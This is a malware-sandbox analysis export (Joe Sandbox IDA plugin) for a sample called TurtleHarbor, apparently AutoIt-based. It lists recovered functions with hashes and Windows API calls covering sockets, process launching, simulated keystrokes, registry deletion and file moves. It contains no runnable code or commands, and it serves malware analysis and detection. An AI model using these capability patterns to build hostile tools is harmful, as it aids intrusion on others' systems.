Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 9dd77ff94014042f4a0aa7ba03dae14f505fb63ef56b0f7c2e2bbb8ebe712cdf
Instruction ID: 7f0ce3362819e8c61a0faea084f86ffd34ef4e9913d7a6b5a3ba5dcc6c135503
Opcode Fuzzy Hash: 9dd77ff94014042f4a0aa7ba03dae14f505fb63ef56b0f7c2e2bbb8ebe712cdf
Instruction Fuzzy Hash: 2921D1727212057FD61776628D83FBB376CDE26794F08D020FD46AB64AE710DE21CAA1

Function 0037F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

Part of subcall function 0032436A: _wcscpy.LIBCMT ref: 0032438D

_wcstok.LIBCMT ref: 0037F2D7
_wcscpy.LIBCMT ref: 0037F366
_memset.LIBCMT ref: 0037F399

Strings

X, xrefs: 0037F3D6

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 6203eab15bd60e35fba26e9372cdf65cf6c1d1e22053523a8bd72fc555a3edeb
Instruction ID: 2cd21bc2895648a12b1465cdfbfdb4530ba1826b7cc527ac8f2a5cd5a8be797e
Opcode Fuzzy Hash: 6203eab15bd60e35fba26e9372cdf65cf6c1d1e22053523a8bd72fc555a3edeb
Instruction Fuzzy Hash: B0C19075504750DFC726EF24D981A5BB7E4BF89310F00892DF8998B2A2DB30ED45CB82

Function 003871EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003872EB
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0038730C
WSAGetLastError.WSOCK32(00000000), ref: 0038731F
htons.WSOCK32(?,?,?,00000000,?), ref: 003873D5
inet_ntoa.WSOCK32(?), ref: 00387392

Part of subcall function 0036B4EA: _strlen.LIBCMT ref: 0036B4F4
Part of subcall function 0036B4EA: _memmove.LIBCMT ref: 0036B516

_strlen.LIBCMT ref: 0038742F
_memmove.LIBCMT ref: 00387498

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 07e636de5bc2cae17cc447a18c8ab00be44d533d5530341c8ce1f660d2aa4964
Instruction ID: 08fc3e544e8206ddf619a60791adc1d6a456bbc6f1abc980968e3f90a27aebbf
Opcode Fuzzy Hash: 07e636de5bc2cae17cc447a18c8ab00be44d533d5530341c8ce1f660d2aa4964
Instruction Fuzzy Hash: AD81D271108300ABC316FB65DC85F6BB7A9EF88714F20895CF5559B292EB70DD41CB91

Function 00311800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f316fa56a6c356ebe1f6eba1fbf627bc488b03ac01045a3f280952bc1fb51f8
Instruction ID: 8d45b7075d61575a3e3480a18f1c4a5e523c358c76a13f28fd476142d2801249
Opcode Fuzzy Hash: 2f316fa56a6c356ebe1f6eba1fbf627bc488b03ac01045a3f280952bc1fb51f8
Instruction Fuzzy Hash: 5B715F30900109EFDB0ACF54CC45AEEBB79FF8A314F148159F915AA251C770AA51CB60

Function 0039B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01015580), ref: 0039BA5D
IsWindowEnabled.USER32(01015580), ref: 0039BA69
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0039BB4D
SendMessageW.USER32(01015580,000000B0,?,?), ref: 0039BB84
IsDlgButtonChecked.USER32(?,?), ref: 0039BBC1
GetWindowLongW.USER32(01015580,000000EC), ref: 0039BBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0039BBFB

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: ad151c1e7fa7c3b0be436ddbff3f2e26c02973b33478923d3591ce6b1ec2694b
Instruction ID: 2fea52926ded98c6f5b8e495461e49f120b2204d21b127c4f60b144c76f8a63a
Opcode Fuzzy Hash: ad151c1e7fa7c3b0be436ddbff3f2e26c02973b33478923d3591ce6b1ec2694b
Instruction Fuzzy Hash: B171DD34604204AFDF279F54EAD4FBAFBB9EF4A300F054059E985972A1C731AD50DB60

Function 0038FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0038FB31
_memset.LIBCMT ref: 0038FBFA
ShellExecuteExW.SHELL32(?), ref: 0038FC3F

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

Part of subcall function 0032436A: _wcscpy.LIBCMT ref: 0032438D

GetProcessId.KERNEL32(00000000), ref: 0038FCB6
CloseHandle.KERNEL32(00000000), ref: 0038FCE5

Strings

@, xrefs: 0038FC0E

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: a8412440a576fb5233740b883546cb6806d9ac006e173f8992b9978e011a4ef9
Instruction ID: c0b2361af09bbba6c10618c4eac9e9ce3f7aa3b3ac074cb74032a250a373ae64
Opcode Fuzzy Hash: a8412440a576fb5233740b883546cb6806d9ac006e173f8992b9978e011a4ef9
Instruction Fuzzy Hash: 75619EB5A00619DFCF16EF94D5919AEB7F4FF48310F1184A9E816AB351DB30AD41CB90

Function 0037174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0037178B
GetKeyboardState.USER32(?), ref: 003717A0
SetKeyboardState.USER32(?), ref: 00371801
PostMessageW.USER32(?,00000101,00000010,?), ref: 0037182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 0037184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 00371894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 003718B7

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8856287208f2a412002d18cd95d0e5d3c6db78574cafa594146d0208d7608a2a
Instruction ID: d2d8f9ccc9a7f155dee5c4db1b382fa90f5408b3510e8e55c916d87783548055
Opcode Fuzzy Hash: 8856287208f2a412002d18cd95d0e5d3c6db78574cafa594146d0208d7608a2a
Instruction Fuzzy Hash: B851D362A087D53DFB37463CC855BBA7EE95B06300F09C589E1DD598D2C29CDC84D751

Function 00371565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 003715A4
GetKeyboardState.USER32(?), ref: 003715B9
SetKeyboardState.USER32(?), ref: 0037161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00371646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00371663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003716A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003716C8

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e70ec5a880aa20efb8c9a9f4b1d2575b8a11c5903f2dca925c4ccc06a8326076
Instruction ID: 63f5d880791bc83865e34580486190d97e8fc20c3a4f0e920f0f4b47ec9d582f
Opcode Fuzzy Hash: e70ec5a880aa20efb8c9a9f4b1d2575b8a11c5903f2dca925c4ccc06a8326076
Instruction Fuzzy Hash: F451D5A26047D53DFB37872C8C45BBABEE95B06300F0CC589E5DD5A8C2D698AC98E750

Function 00375BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00375BC5
_wcsncpy.LIBCMT ref: 00375BFA
_wcsncpy.LIBCMT ref: 00375C2C
_wcsncpy.LIBCMT ref: 00375C5F
_wcsncpy.LIBCMT ref: 00375CA1
_wcsncpy.LIBCMT ref: 00375CDB
_wcsncpy.LIBCMT ref: 00375D0A

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 04e3ef554c4a57b83ed61eff85adad977b950216cce2e3681923171e1fdfe5ac
Instruction ID: 58add81af187345ecb9a67edebd42bfa213e687630c9839c2d799d56ac5e1555
Opcode Fuzzy Hash: 04e3ef554c4a57b83ed61eff85adad977b950216cce2e3681923171e1fdfe5ac
Instruction Fuzzy Hash: 12419265C2061875CB23FBB4CC86ACFB7B8AF05310F508856F519E7121E635A715C3A5

Function 00373B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00374BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00373B8A,?), ref: 00374BE0

Part of subcall function 00374BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00373B8A,?), ref: 00374BF9

lstrcmpiW.KERNEL32(?,?), ref: 00373BAA
_wcscmp.LIBCMT ref: 00373BC6
MoveFileW.KERNEL32(?,?), ref: 00373BDE
_wcscat.LIBCMT ref: 00373C26
SHFileOperationW.SHELL32(?), ref: 00373C92

Strings

\*.*, xrefs: 00373C20

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 3d726025cb6cffad6a9c444bbc16b221c6d5ae074af877635341f5e48f144d39
Instruction ID: 133362a47f8845b7cc66f03312986cd9d21a1a8284f230a56d291800be84adcc
Opcode Fuzzy Hash: 3d726025cb6cffad6a9c444bbc16b221c6d5ae074af877635341f5e48f144d39
Instruction Fuzzy Hash: E8418D7150C345AAC767EF64D481ADBB7ECAF89340F40492EF48AC7151EB38D688C752

Function 003978B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003978CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00397976
IsMenu.USER32(?), ref: 0039798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003979D6
DrawMenuBar.USER32 ref: 003979E9

Strings

0, xrefs: 003978C3

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 1fee37d45eff9699fbf450e33061575bcf3d78752f02630d853f2a5f81f1971b
Instruction ID: 3326edf9ac8eeee6d82d5887beb843f162632f8dba5559e8f7b6b475f63485f2
Opcode Fuzzy Hash: 1fee37d45eff9699fbf450e33061575bcf3d78752f02630d853f2a5f81f1971b
Instruction Fuzzy Hash: 77415B75A18209EFDF12DF54D884EAABBF9FF0A310F058129E9559B290D734AD50CFA0

Function 00391602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00391631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0039165B
FreeLibrary.KERNEL32(00000000), ref: 00391712

Part of subcall function 00391602: RegCloseKey.ADVAPI32(?), ref: 00391678
Part of subcall function 00391602: FreeLibrary.KERNEL32(?), ref: 003916CA
Part of subcall function 00391602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003916ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 003916B5

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 1c2a652fe739ee67b702828279979194adccb58731b89fd0a7c9c594250604b8
Instruction ID: c54fae1c9a7d3eea77453c822384bae8b37d9846b89e56217cbd1c9d853d89c9
Opcode Fuzzy Hash: 1c2a652fe739ee67b702828279979194adccb58731b89fd0a7c9c594250604b8
Instruction Fuzzy Hash: 46310AB590110ABFDF16DB90DC89AFFB7BCEF09341F04016AE916A2150EA749E459AA0

Function 003968F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00396911
GetWindowLongW.USER32(01015580,000000F0), ref: 00396944
GetWindowLongW.USER32(01015580,000000F0), ref: 00396979
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 003969AB
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 003969D5
GetWindowLongW.USER32(?,000000F0), ref: 003969E6
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00396A00

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 480f71103d620af07c7bb23135b8b5961b1b6c9b1cb9f2dfaadf1a184b54dc3e
Instruction ID: 6604bce32b5504425c9130980a78829e81e56398b7d13feba0a22be9eeb54f91
Opcode Fuzzy Hash: 480f71103d620af07c7bb23135b8b5961b1b6c9b1cb9f2dfaadf1a184b54dc3e
Instruction Fuzzy Hash: 75311230606151AFDF22CF58ED8AF6537E9EB4A714F1A01A5F9158F2B2CB72AC40DB50

Function 0036E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036E2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036E2F0
SysAllocString.OLEAUT32(00000000), ref: 0036E2F3
SysAllocString.OLEAUT32(?), ref: 0036E311
SysFreeString.OLEAUT32(?), ref: 0036E31A
StringFromGUID2.OLE32(?,?,00000028), ref: 0036E33F
SysAllocString.OLEAUT32(?), ref: 0036E34D

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: c126c2d2b15894404896745498660c73078e5a9997c552cddc5c41ce3f42461a
Instruction ID: b47fd45e6172185256813fbebd3cab8bd5e4af552f79d7af0da3df5ec0f9461d
Opcode Fuzzy Hash: c126c2d2b15894404896745498660c73078e5a9997c552cddc5c41ce3f42461a
Instruction Fuzzy Hash: 5A21A47A604219BF9F16DFA8DC88CBF77ACEB09360B158125FA14DB254D670EC498B60

Function 0038685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00388475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003884A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003868B1
WSAGetLastError.WSOCK32(00000000), ref: 003868C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003868F9
connect.WSOCK32(00000000,?,00000010), ref: 00386902
WSAGetLastError.WSOCK32 ref: 0038690C
closesocket.WSOCK32(00000000), ref: 00386935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0038694E

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: d4eba93ccaaba9a11e1767a0f374d66a6360ceb8f32d66df30a674d6f06f584c
Instruction ID: ff2d1bb324064c29cbf8b17d4ef415c54742105f7ed5c95ec435e78ef740c333
Opcode Fuzzy Hash: d4eba93ccaaba9a11e1767a0f374d66a6360ceb8f32d66df30a674d6f06f584c
Instruction Fuzzy Hash: C331E771200208AFDF16AF64CC86BBD77ADEB45720F058059FD05AB291DB74AC448BA1

Function 0036E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036E3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036E3CB
SysAllocString.OLEAUT32(00000000), ref: 0036E3CE
SysAllocString.OLEAUT32 ref: 0036E3EF
SysFreeString.OLEAUT32 ref: 0036E3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 0036E412
SysAllocString.OLEAUT32(?), ref: 0036E420

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 03fc73d374b7b7f67b17931ce3ad6fe004651c66638dd5a98d8a2e24fed07ad8
Instruction ID: a63e27e5984d1f7f2a4ca39e06ec713885f12876b608d13cf80107fde1f93ae7
Opcode Fuzzy Hash: 03fc73d374b7b7f67b17931ce3ad6fe004651c66638dd5a98d8a2e24fed07ad8
Instruction Fuzzy Hash: 03218639604204AFAB169FB9DC88CAF77ECEB0D360B11C125F915CB264EA74EC458B64

Function 0036FE19 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0036FE2C
__wcsnicmp.LIBCMT ref: 0036FE4D
__wcsnicmp.LIBCMT ref: 0036FE67

Strings

#OnAutoItStartRegister, xrefs: 0036FE61
#notrayicon, xrefs: 0036FE24
#requireadmin, xrefs: 0036FE47

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
